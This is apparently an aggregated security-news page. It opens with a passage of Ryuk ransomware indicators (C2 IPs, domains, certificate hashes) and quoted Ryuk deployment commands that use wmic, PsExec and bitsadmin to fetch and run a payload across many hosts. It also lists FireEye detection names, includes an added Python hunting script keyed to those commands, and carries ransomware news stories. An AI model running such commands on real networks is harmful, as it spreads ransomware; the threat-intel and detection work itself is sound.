10/7/20 | 88.119.175.153:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=zhameharden[.]com | 2670bf08c43d995c74b4b83383af6a69
10/7/20 | 213.252.245.71:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=serviceboosterr[.]com | 127cc347b711610c3bcee434eb8bf822
10/7/20 | 213.252.246.144:443 | C=US,ST=TX,L=Texas,O=US,OU=,CN=servicewikii[.]com | b3e7ab478ffb0213017d57a88e7b2e3b
10/7/20 | 5.2.64.149:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=sobcase[.]com | 188f603570e7fa81b92906af7af177dc
10/7/20 | 5.2.64.144:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=unlockwsa[.]com | 22d7f35e624b7bcee7bb78ee85a7945c
10/7/20 | 88.119.174.139:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=serviceupdatter[.]com | 12c6e173fa3cc11cc6b09b01c5f71b0c
10/7/20 | 88.119.174.133:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=service-boosterr[.]com | 28435684c76eb5f1c4b48b6bbc4b22af
10/7/20 | 88.119.175.214:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=dotmaingame[.]com | 9c2d64cf4e8e58ef86d16e9f77873327
10/7/20 | 5.2.72.200:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=wodemayaa[.]com | f6f484baf1331abf55d06720de827190
10/7/20 | 5.2.79.10:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=hybriqdjs[.]com | d8eacda158594331aec3ad5e42656e35
10/7/20 | 5.2.79.12:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=gunsdrag[.]com | 29032dd12ea17fc37ffff1ee94cc5ba8
10/7/20 | 5.2.79.121:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=gungameon[.]com | eaf32b1c2e31e4e7b6d5c3e6ed6bff3d
10/7/20 | 5.2.64.174:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=quwasd[.]com | 442680006c191692fcc3df64ec60d8fa
10/7/20 | 5.2.64.172:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=remotessa[.]com | 0593cbf6b3a3736a17cd64170e02a78d
10/7/20 | 5.2.64.167:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=secondlivve[.]com | 38df81824bd8cded4a8fa7ad9e4d1f67
10/7/20 | 5.2.64.182:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=luckyhunterrs[.]com | 99dbe71ca7b9d4a1d9f722c733b3f405
10/7/20 | 88.119.171.97:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=servicesupdater[.]com | 7d7199ffa40c50b6e5b025b8cb2661b2
10/7/20 | 88.119.171.96:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=servicemount[.]com | f433d25a0dad0def0510cd9f95886fdb
10/7/20 | 96.9.209.217:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=fastbloodhunter[.]com | e84c7aa593233250efac903c19f3f589
10/7/20 | 69.61.38.132:443 | C=US,ST=CA,L=Mountainvew,O=Office,OU=,CN=kungfupandasa[.]com | e6e80f6eb5cbfc73cde40819007dcc53
10/13/20 | 45.147.230.131:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=bakcup-monster[.]com | 4fdeab3dad077589d52684d35a9ea4ab
10/13/20 | 45.147.229.92:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=bakcup-checker[.]com | b70cdb49b26e6e9ba7d0c42d5f3ed3cb
10/13/20 | 45.147.229.68:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=backup-simple[.]com | 57024c1fe5c4acaf30434ba1f58f9144
10/13/20 | 45.147.229.52:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=backup-leader[.]com | ec5496048f1962494d239d377e53db0c
10/13/20 | 45.147.229.44:443 | C=US,ST=TX,L=Texsa,O=lol,OU=,CN=backup-helper[.]com | 938593ac1c8bdb2c5256540d7c8476c8
10/14/20 | 45.147.230.87:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=nasmastrservice[.]com | cced46e0a9b6c382a97607beb95f68ab
10/14/20 | 45.147.230.159:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=service-leader[.]com | e912980fc8e9ec1e570e209ebb163f65
10/14/20 | 45.147.230.141:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=service-checker[.]com | 39d7160ce331a157d3ecb2a9f8a66f12
10/14/20 | 45.147.230.140:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=nas-simple-helper[.]com | d9ca73fe10d52eef6952325d102f0138
10/14/20 | 45.147.230.133:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=nas-leader[.]com | 920d04330a165882c8076c07b00e1d93
10/14/20 | 45.147.230.132:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=boost-servicess[.]com | 771463611a43ee35a0ce0631ef244dee
10/14/20 | 45.147.229.180:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=elephantdrrive[.]com | 1e4a794da7d3c6d0677f7169fbe3b526
10/14/20 | 45.147.230.159:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=service-leader[.]com | 9c7fe10135f6ad96ded28fac51b79dfd
10/15/20 | 45.147.230.132:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=boost-servicess[.]com | a78c0e2920e421667ae734d923dd5ca6
10/15/20 | 45.138.172.95:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=service-hellper[.]com | a0b2378ceae498f46401aadeb278fb31
10/16/20 | 108.62.12.119:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=top-backuphelper[.]com | e95bb7804e3add830496bd36664ed339
10/16/20 | 108.62.12.105:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=best-nas[.]com | 8d5dc95b3bd4d16a3434b991a09bf77e
10/16/20 | 108.62.12.114:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=top-backupservice[.]com | d5de2f5d2ca29da1724735cdb8fbc63f
10/16/20 | 108.62.12.116:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=bestservicehelper[.]com | 9c7396ecd107ee8f8bf5521afabb0084
10/16/20 | 45.147.230.141:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=service-checker[.]com | 1134a6f276f4297a083fc2a605e24f70
10/16/20 | 45.147.230.140:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=nas-simple-helper[.]com | 2150045f476508f89d9a322561b28ff9
10/16/20 | 45.147.230.133:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=nas-leader[.]com | f4ddc4562e5001ac8fdf0b7de079b344
10/19/20 | 74.118.138.137:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=top3-services[.]com | 75fb6789ec03961c869b52336fa4e085
10/19/20 | 74.118.138.115:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=simple-backupbooster[.]com | 9f5e845091015b533b59fe5e8536a435
10/19/20 | 108.177.235.53:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=best-backup[.]com | 4b78eaa4f2748df27ebf6655ea8a7fe9
10/19/20 | 74.118.138.138:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=topbackup-helper[.]com | bcccda483753c82e62482c55bc743c16
10/21/20 | 45.153.241.1:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=backup1helper[.]com | 672c66dd4bb62047bb836bd89d2e1a65
10/21/20 | 45.153.240.240:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=checktodrivers[.]com | 6825409698a326cc319ca40cd85a602e
10/21/20 | 45.153.240.194:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=driver1master[.]com | 7f9be0302da88e0d322e5701d52d4128
10/21/20 | 45.153.240.138:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=boost-yourservice[.]com | 2c6a0856d1a75b303337ac0807429e88
10/21/20 | 45.153.240.136:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=backup1master[.]com | 6559dbf8c47383b7b493500d7ed76f6a
10/23/20 | 45.153.240.157:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=driver1updater[.]com | 7bd044e0a6689ef29ce23e3ccb0736a3
10/23/20 | 45.153.240.178:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=service1updater[.]com | 9859a8336d097bc30e6e5c7a8279f18e
10/23/20 | 45.153.240.220:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=driverdwl[.]com | 43fb2c153b59bf46cf6f67e0ddd6ef51
10/23/20 | 45.153.240.222:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=viewdrivers[.]com | 22bafb30cc3adaa84fef747d589ab235
10/23/20 | 45.153.241.134:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=backups1helper[.]com | 31e87ba0c90bb38b986af297e4905e00
10/23/20 | 45.153.241.138:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=driver1downloads[.]com | f8a14846b7da416b14303bced5a6418f
10/23/20 | 45.153.241.146:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=servicehel[.]com | 01abdaf870d859f9c1fd76f0b0328a2b
10/23/20 | 45.153.241.153:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=service-hel[.]com | c2eaf144e21f3aef5fe4b1502d318ba6
10/23/20 | 45.153.241.158:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=servicereader[.]com | de54af391602f3deea19cd5e1e912316
10/23/20 | 45.153.241.167:443 | C=US,ST=TX,L=Texas,O=US,OU=,CN=view-backup[.]com | 5f6fa19ffe5735ff81b0e7981a864dc8
10/23/20 | 45.147.231.222:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=top3servicebooster[.]com | ff54a7e6f51a850ef1d744d06d8e6caa
10/23/20 | 45.153.241.141:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=service1view[.]com | 4cda9d0bece4f6156a80967298455bd5
10/26/20 | 74.118.138.139:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=topbackupintheworld[.]com | e317485d700bf5e8cb8eea1ec6a72a1a
10/26/20 | 108.62.12.12:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=topservice-masters[.]com | e0022cbf0dd5aa597fee73e79d2b5023
10/26/20 | 108.62.12.121:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=topservicebooster[.]com | 44e7347a522b22cdf5de658a4237ce58
10/26/20 | 172.241.27.65:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=backup1services[.]com | cd3e51ee538610879d6fa77fa281bc6f
10/26/20 | 172.241.27.68:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=backupmaster-service[.]com | 04b6aec529b3656040a68e17afdabfa4
10/26/20 | 172.241.27.70:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=backupmasterservice[.]com | 200c25c2b93203392e1acf5d975d6544
10/26/20 | 45.153.241.139:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=driver-boosters[.]com | 9d7c52c79f3825baf97d1318bae3ebe2
10/27/20 | 45.153.241.14:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=service1update[.]com | 5bae28b0d0e969af2c0eda21abe91f35
10/28/20 | 190.211.254.154:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=driverjumper[.]com | a1e62e7e547532831d0dd07832f61f54
10/28/20 | 81.17.28.70:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=service1boost[.]com | 67c7c75d396988ba7d6cd36f35def3e4
10/28/20 | 81.17.28.105:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=idrivehepler[.]com | 880e59b44e7175e62d75128accedb221
10/28/20 | 179.43.160.205:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=idrivedownload[.]com | cdea09a43bef7f1679e9cd1bbeb4b657
10/28/20 | 179.43.158.171:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=idrivefinder[.]com | 512c6e39bf03a4240f5a2d32ee710ce5
10/28/20 | 179.43.133.44:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=idrivedwn[.]com | 

87f3698c743f8a1296babf9fbebafa9f

10/28/20

179.43.128.5:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=idrivecheck[.]com

6df66077378c5943453b36bd3a1ed105

10/28/20

179.43.128.3:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=idriveupdate[.]com

9706fd787a32a7e94915f91124de3ad3

10/28/20

81.17.28.122:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=idriveview[.]com

0e1b0266de2b5eaf427f5915086b4d7c

RYUK Commands

start wmic /node:@C:\share$\comps1.txt /user:[REDACTED] /password:[REDACTED] process call create "cmd.exe /c bitsadmin /transfer vVv \\[REDACTED]\share$\vVv.exe %APPDATA%\vVv.exe & %APPDATA%\vVv.exe"

start PsExec.exe /accepteula @C:\share$\comps1.txt -u [REDACTED] -p [REDACTED] cmd /c COPY "\\[REDACTED]\share$\vVv.exe" "C:\windows\temp\vVv.exe"

start PsExec.exe -d @C:\share$\comps1.txt -u [REDACTED] -p [REDACTED] cmd /c c:\windows\temp\vVv.exe

Detecting the Techniques

FireEye detects this activity across our platforms. The following table contains several specific detection names from a larger list of detections that were available prior to this activity occurring.

Platform: Endpoint Security (signature names)

  • KEGTAP INTERACTIVE CMD.EXE CHILD PROCESS (BACKDOOR)
  • KEGTAP DLL EXECUTION VIA RUNDLL32.EXE (BACKDOOR)
  • POTENTIAL KEGTAP MALWARE ACTIVITY (BACKDOOR)
  • SINGLEMALT (DOWNLOADER)
  • STILLBOT (BACKDOOR)
  • WINEKEY (DOWNLOADER)
  • CORKBOT (BACKDOOR)

Platform: Network Security and Email Security (signature names)

  • Downloader.Win.KEGTAP
  • Trojan.KEGTAP
  • APTFIN.Backdoor.Win.BEERBOT
  • APTFIN.Downloader.Win.SINGLEMALT
  • APTFIN.Backdoor.Win.STILLBOT
  • APTFIN.Downloader.Win.WINEKEY
  • APTFIN.Backdoor.Win.CORKBOT
  • FE_Downloader_Win64_KEGTAP
  • FE_APTFIN_Backdoor_Win32_BEERBOT
  • FE_APTFIN_Backdoor_Win_BEERBOT
  • FE_APTFIN_Downloader_Win32_SINGLEMALT
  • FE_APTFIN_Downloader_Win64_SINGLEMALT
  • FE_APTFIN_Backdoor_Win_STILLBOT
  • FE_APTFIN_Downloader_Win_WINEKEY
  • FE_APTFIN_Backdoor_Win_CORKBOT
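A hunt for the deployment pattern in the RYUK Commands section above, run over process-creation logs, as an added example that is not FireEye's code or part of the original post: it encodes the traits of those three commands (wmic/PsExec fan-out to a host list read from a file, credentials on the command line, staging via bitsadmin from a share, launch from %APPDATA% or C:\Windows\Temp) as rules and alerts only when several co-occur in one event. The log format, hostnames and timestamps are constructed assumptions.

```python
"""Hunt for the Ryuk deployment pattern shown above in process-creation logs.

Added example, not FireEye's code. Input is a constructed, pipe-delimited log
(timestamp|host|parent_image|command_line); the field layout, hostnames and
timestamps are assumptions made for illustration.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Each rule captures one trait of the three commands above: fan-out to a host
# list read from a file, explicit credentials on the command line, staging a
# binary from a UNC share with BITS, and launching from %APPDATA% or
# C:\Windows\Temp. Any one trait alone is noisy; several together are not.
RULES = [
    ("wmic_remote_create_hostlist",
     re.compile(r"\bwmic\b.*?/node:@\S+.*?process\s+call\s+create", re.I)),
    ("psexec_hostlist_with_creds",
     re.compile(r"\bpsexec\b.*?@\S+.*?-u\s+\S+.*?-p\s+\S+", re.I)),
    ("bitsadmin_transfer_from_share",
     re.compile(r"\bbitsadmin\b.*?/transfer\b.*?\\\\\S+", re.I)),
    ("exec_from_appdata",
     re.compile(r'%APPDATA%\\[^\s"&]+\.exe', re.I)),
    ("exec_from_windows_temp",
     re.compile(r'c:\\windows\\temp\\[^\s"]+\.exe', re.I)),
]


@dataclass
class Finding:
    timestamp: str
    host: str                      # host that issued the command
    rules: List[str] = field(default_factory=list)


def parse_line(line: str) -> Optional[dict]:
    """Split one log line into its four fields; return None if malformed."""
    parts = line.rstrip("\n").split("|", 3)
    if len(parts) != 4:
        return None
    timestamp, host, parent, cmdline = parts
    return {"timestamp": timestamp, "host": host,
            "parent": parent, "cmdline": cmdline}


def match_rules(cmdline: str) -> List[str]:
    """Names of every rule whose pattern occurs in the command line."""
    return [name for name, pattern in RULES if pattern.search(cmdline)]


def scan(lines, threshold: int = 2) -> List[Finding]:
    """Return a Finding for each event that trips at least `threshold` rules."""
    findings = []
    for line in lines:
        event = parse_line(line)
        if event is None:
            continue
        hits = match_rules(event["cmdline"])
        if len(hits) >= threshold:
            findings.append(Finding(event["timestamp"], event["host"], hits))
    return findings


def summarize(findings: List[Finding]) -> Dict[str, int]:
    """Count findings per issuing host: one host fanning out is the tell."""
    counts: Dict[str, int] = {}
    for finding in findings:
        counts[finding.host] = counts.get(finding.host, 0) + 1
    return counts


# Constructed sample: the three commands from the post as if issued from one
# workstation, plus two benign events. [REDACTED] is kept as in the post.
SAMPLE_LOG = r"""
2020-10-21T03:12:07Z|WS-ADMIN01|cmd.exe|start wmic /node:@C:\share$\comps1.txt /user:[REDACTED] /password:[REDACTED] process call create "cmd.exe /c bitsadmin /transfer vVv \\[REDACTED]\share$\vVv.exe %APPDATA%\vVv.exe & %APPDATA%\vVv.exe"
2020-10-21T03:12:40Z|WS-ADMIN01|cmd.exe|start PsExec.exe /accepteula @C:\share$\comps1.txt -u [REDACTED] -p [REDACTED] cmd /c COPY "\\[REDACTED]\share$\vVv.exe" "C:\windows\temp\vVv.exe"
2020-10-21T03:13:02Z|WS-ADMIN01|cmd.exe|start PsExec.exe -d @C:\share$\comps1.txt -u [REDACTED] -p [REDACTED] cmd /c c:\windows\temp\vVv.exe
2020-10-21T03:14:11Z|WS-0042|explorer.exe|"C:\Program Files\Mozilla Firefox\firefox.exe"
2020-10-21T03:15:55Z|WS-0042|svchost.exe|bitsadmin /list
""".strip().splitlines()


if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for finding in hits:
        print(finding.timestamp, finding.host, ", ".join(finding.rules))
    print("findings per issuing host:", summarize(hits))
```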

More Hospitals Hit by Growing Wave of Ransomware Attacks

Hospitals in New York and Oregon were targeted on Tuesday by threat actors who crippled systems and forced ambulances with sick patients to be rerouted, in some cases.

Security Blueprints of Many Companies Leaked in Hack of Swedish Firm Gunnebo

In March 2020, KrebsOnSecurity alerted Swedish security giant Gunnebo Group that hackers had broken into its network and sold the access to a criminal group which specializes in deploying ransomware. In August, Gunnebo said it had successfully thwarted a ransomware attack, but this week it emerged that the intruders stole and published online tens of thousands of sensitive documents — including schematics of client bank vaults and surveillance systems.

The Gunnebo Group is a Swedish multinational company that provides physical security to a variety of customers globally, including banks, government agencies, airports, casinos, jewelry stores, tax agencies and even nuclear power plants. The company has operations in 25 countries, more than 4,000 employees, and billions in revenue annually.

Acting on a tip from Milwaukee, Wis.-based cyber intelligence firm Hold Security, KrebsOnSecurity in March told Gunnebo about a financial transaction between a malicious hacker and a cybercriminal group which specializes in deploying ransomware. That transaction included credentials to a Remote Desktop Protocol (RDP) account apparently set up by a Gunnebo Group employee who wished to access the company’s internal network remotely.

Five months later, Gunnebo disclosed it had suffered a cyber attack targeting its IT systems that forced the shutdown of internal servers. Nevertheless, the company said its quick reaction prevented the intruders from spreading the ransomware throughout its systems, and that the overall lasting impact from the incident was minimal.

Earlier this week, Swedish news agency Dagens Nyheter confirmed that hackers recently published online at least 38,000 documents stolen from Gunnebo’s network. Linus Larsson, the journalist who broke the story, says the hacked material was uploaded to a public server during the second half of September, and it is not known how many people may have gained access to it.

Larsson quotes Gunnebo CEO Stefan Syrén saying the company never considered paying the ransom the attackers demanded in exchange for not publishing its internal documents. What’s more, Syrén seemed to downplay the severity of the exposure.

“I understand that you can see drawings as sensitive, but we do not consider them as sensitive automatically,” the CEO reportedly said. “When it comes to cameras in a public environment, for example, half the point is that they should be visible, therefore a drawing with camera placements in itself is not very sensitive.”

It remains unclear whether the stolen RDP credentials were a factor in this incident. But the password to the Gunnebo RDP account — “password01” — suggests the security of its IT systems may have been lacking in other areas as well.

After this author posted a request for contact from Gunnebo on Twitter, KrebsOnSecurity heard from Rasmus Jansson, an account manager at Gunnebo who specializes in protecting client systems from electromagnetic pulse (EMP) attacks or disruption, short bursts of energy that can damage electrical equipment.

Jansson said he relayed the stolen credentials to the company’s IT specialists, but that he does not know what actions the company took in response. Reached by phone today, Jansson said he quit the company in August, right around the time Gunnebo disclosed the thwarted ransomware attack. He declined to comment on the particulars of the extortion incident.

Ransomware attackers often spend weeks or months inside of a target’s network before attempting to deploy malware across the network that encrypts servers and desktop systems unless and until a ransom demand is met.

That’s because gaining the initial foothold is rarely the difficult part of the attack. In fact, many ransomware groups now have such an embarrassment of riches in this regard that they’ve taken to hiring external penetration testers to carry out the grunt work of escalating that initial foothold into complete control over the victim’s network and any data backup systems — a process that can be hugely time consuming.

But prior to launching their ransomware, it has become common practice for these extortionists to offload as much sensitive and proprietary data as possible. In some cases, this allows the intruders to profit even if their malware somehow fails to do its job. In other instances, victims are asked to pay two extortion demands: One for a digital key to unlock encrypted systems, and another in exchange for a promise not to publish, auction or otherwise trade any stolen data.

While it may seem ironic when a physical security firm ends up having all of its secrets published online, the reality is that some of the biggest targets of ransomware groups continue to be companies which may not consider cybersecurity or information systems as their primary concern or business — regardless of how much may be riding on that technology.

Indeed, companies that persist in viewing cyber and physical security as somehow separate seem to be among the favorite targets of ransomware actors. Last week, a Russian journalist published a video on YouTube claiming to be an interview with the cybercriminals behind the REvil/Sodinokibi ransomware strain, which is the handiwork of a particularly aggressive criminal group that’s been behind some of the biggest and most costly ransom attacks in recent years.

In the video, the REvil representative stated that the most desirable targets for the group were agriculture companies, manufacturers, insurance firms, and law firms. The REvil actor claimed that on average roughly one in three of its victims agrees to pay an extortion fee.

Mark Arena, CEO of cybersecurity threat intelligence firm Intel 471, said while it might be tempting to believe that firms which specialize in information security typically have better cybersecurity practices than physical security firms, few organizations have a deep understanding of their adversaries.

Arena said this is a particularly acute shortcoming with many managed service providers (MSPs), companies that provide outsourced security services to hundreds or thousands of clients who might not otherwise be able to afford to hire cybersecurity professionals.

“The harsh and unfortunate reality is the security of a number of security companies is shit,” Arena said. “Most companies tend to have a lack of ongoing and up to date understanding of the threat actors they face.”

Enel Group suffered the second ransomware attack this year

Multinational energy company Enel Group has been hit by Netwalker ransomware operators that are asking a $14 million ransom.

Systems at the multinational energy company Enel Group have been infected with Netwalker ransomware; it is the second ransomware attack suffered by the energy giant this year. The Netwalker operators are asking a $14 million ransom for the decryption key. The hackers claim to have stolen several terabytes of data from the company and threaten to leak them if the ransom is not paid.

Enel S.p.A., or the Enel Group, is an Italian multinational energy company that is active in the sectors of electricity generation and distribution, as well as in the distribution of natural gas.

The company has more than 61 million customers in 40 countries; it ranks 87th in the Fortune Global 500, with $90 billion in revenue in 2019.

In June, Enel was hit by Snake ransomware, but the attack was quickly contained and the malware was not able to spread within its network.

The news of a possible ransomware attack against Enel Group was reported to BleepingComputer by a researcher on October 19.

The researcher shared with BleepingComputer a Netwalker ransom note that appeared to be used in the attack on Enel Group.

[Image: Netwalker ransom note used against Enel Group. Source: Bleeping Computer]

BleepingComputer attempted to notify Enel Group last week without success. A few days later, Netwalker announced the leak of the company data through their support chat.

Enel never replied to the ransomware operators’ message; for this reason, the attackers started leaking a portion of the stolen data as proof of the breach.

The operators are asking $14 million worth of Bitcoin (roughly 1234.02380000 BTC).

[Image: Netwalker leak-site page for Enel Group. Source: Bleeping Computer]

Today, the Netwalker ransomware operators added Enel Group to their data leak site, along with some screenshots of unencrypted files stolen from the company.

The Italian cyber security firm TG soft publicly shared the news of the attack in a tweet:

The hackers stole about 5 terabytes of documents from the company and announced that they will “analyze every file for interesting things” and publish it on their leak site.

At the time of publishing this post, the company has yet to confirm the incident. Let’s remember that the company’s conduct will have to comply with the current EU privacy legislation, the GDPR.

Pierluigi Paganini

(SecurityAffairs – hacking, ENEL Group)

The post Enel Group suffered the second ransomware attack this year appeared first on Security Affairs.

WannaCry Ransomware Explained

Ransomware has become one of the main cyber threats that can have devastating effects on organizations, resulting in financial damage, corporate instability, and reputational harm. This type of malware uses complex encryption algorithms which lock up all files on a machine unless a decryption key is used to retrieve the data. A ransom message appears […]

The post WannaCry Ransomware Explained appeared first on Heimdal Security Blog.

The Nastiest Malware of 2020


For the third year running, we’ve examined the year’s biggest cyber threats and ranked them to determine which ones are the absolute worst. Somewhat unsurprisingly, phishing and RDP-related breaches remain the top methods we’ve seen cybercriminals using to launch their attacks. Additionally, while new examples of malware and cybercriminal tactics crop up each day, plenty of the same old players, such as ransomware, continue to get upgrades and dominate the scene.

For example, a new trend in ransomware this year is the addition of a data leak/auction website, where criminals will reveal or auction off data they’ve stolen in a ransomware attack if the victim refuses to pay. The threat of data exposure creates a further incentive for victims to pay ransoms, lest they face embarrassing damage to their personal or professional reputations, not to mention hefty fines from privacy-related regulatory bodies like GDPR.

But the main trend we’ll highlight here is that of modularity. Today’s malicious actors have adopted a more modular malware methodology, in which they combine attack methods and mix-and-match tactics to ensure maximum damage and/or financial success.

Here are a few of the nastiest characters and a breakdown of how they can work together.

  • Emotet botnet + TrickBot Trojan + Conti/Ryuk ransomware
    There’s a reason Emotet has topped our list for 3 years in a row. Even though it’s not a ransomware payload itself, it’s the botnet that is responsible for the most ransomware infections, making it pretty darn nasty. It’s often seen with TrickBot, Dridex, QakBot, Conti/Ryuk, BitPaymer and REvil.

    Here’s how an attack might start with Emotet and end with ransomware. The botnet is used in a malicious spam campaign. An unwitting employee at a company receives the spam email, accidentally downloads the malicious payload. With its foot in the door, Emotet drops TrickBot, an info-stealing Trojan. TrickBot spreads laterally through the network like a worm, infecting every machine it encounters. It “listens” for login credentials (and steals them), aiming to get domain-level access. From there, attackers can perform recon on the network, disable protections, and drop Conti/Ryuk ransomware at their leisure.
  • Ursnif Trojan + IcedID Trojan + Maze ransomware
    Ursnif, also known as Gozi or Dreambot, is a banking Trojan that has resurfaced after being mostly dormant for a few years. In an attack featuring this troublesome trio, Ursnif might land on a machine via a malicious spam email, botnet, or even TrickBot, and then drop the IcedID Trojan to improve the attackers’ chances of getting the credentials or intel they want. (Interestingly, IcedID has been upgraded to use steganographic payloads. Steganography in malware refers to concealing malicious code inside another file, message, image or video.) Let’s say the Trojans obtain the RDP credentials for the network they’ve infected. In this scenario, the attackers can now sell those credentials to other bad actors and/or deploy ransomware, typically Maze. (Fun fact: Maze is believed to have “pioneered” the data leak/auction website trend.)
  • Dridex/Emotet malspam + Dridex Trojan + BitPaymer/DoppelPaymer ransomware
    Like TrickBot, Dridex is another very popular banking/info-stealing Trojan that’s been around for years. When Dridex is in play, it is either dropped via Emotet or its authors’ own malicious spam campaign. Also like TrickBot, Dridex spreads laterally, listens for credentials, and typically deploys ransomware like BitPaymer/DoppelPaymer.

As you can see, there are a variety of ways the attacks can be carried out, but the end goal is more or less the same. The diverse means just help ensure the likelihood of success.

The characters mentioned above are, by no means, the only names on our list. Here are some of the other notable contenders for Nastiest Malware.

  • Sodinokibi/REvil/GandCrab ransomware – all iterations of the same ransomware, this ransomware as a service (RaaS) payload is available for anyone to use, as long as the authors get a cut of any successful ransoms.
  • CrySiS/Dharma/Phobos ransomware – also RaaS payloads, these are almost exclusively deployed using compromised RDP credentials that are either brute-forced or easily guessed.
  • Valak – a potent multi-functional malware distribution tool. Not only does it commonly distribute nasty malware such as IcedID and Ursnif, but it also has information stealing functionalities built directly into the initial infection.
  • QakBot – an info-stealing Trojan often dropped by Emotet or its own malspam campaigns with links to compromised websites. It’s similar to TrickBot and Dridex and may be paired with ProLock ransomware.

Combine protections to combat combined attacks.

If businesses want to stay safe, they need to implement multiple layers of protection against these types of layered attacks. Here are some tips from our experts.

  • Lock down RDP. Security analyst Tyler Moffitt says unsecured RDP has risen over 40% since the COVID-19 pandemic began because more businesses are enabling their workforce to work remotely. Unfortunately, many are not doing so securely. He recommends businesses use RDP solutions that encrypt the data and use multi-factor authentication to increase security when remoting into other machines.
  • Educate end users about phishing. Principal product manager Phil Karcher points out that many of the attack scenarios listed above could be prevented with stronger phishing/spam awareness among end users. He recommends running regular security training and phishing simulations with useful feedback. He also says it’s critical that employees know when and how to report a suspicious message.
  • Install reputable cybersecurity software. Security intelligence director Grayson Milbourne can’t stress enough the importance of choosing a solution that uses real-time threat intelligence and offers multi-layered shielding to detect and prevent multiple kinds of attacks at different attack stages.
  • Set up a strong backup and disaster recovery plan. VP of product management Jamie Zajac says that, particularly with a mostly or entirely remote workforce, businesses can’t afford not to have a strong backup. She strongly recommends regular backup testing and setting alerts and regular reporting so admins can easily see if something’s amiss.

Discover more about 2020’s Nastiest Malware on the Webroot Community.

The post The Nastiest Malware of 2020 appeared first on Webroot Blog.

Organizations struggle to obtain quality threat data to guide key security decisions

Organizations are often forced to make critical security decisions based on threat data that is not accurate, relevant and fresh, a Neustar report reveals. Just 60% of cybersecurity professionals surveyed indicate that the threat data they receive is both timely and actionable, and only 29% say the data they receive is both extremely accurate and relevant to the threats their organization is facing at that moment. Few orgs basing decisions on near real-time data With … More

The post Organizations struggle to obtain quality threat data to guide key security decisions appeared first on Help Net Security.

Ransomware attack disabled Georgia County Election database

A ransomware attack recently hit a Georgia county government and reportedly disabled a database used to verify voter signatures.

A ransomware attack hit a Georgia county government early this month and disabled a database used to verify voter signatures when authenticating absentee ballots. Validating absentee ballots sent by mail by analyzing signatures is a common process.

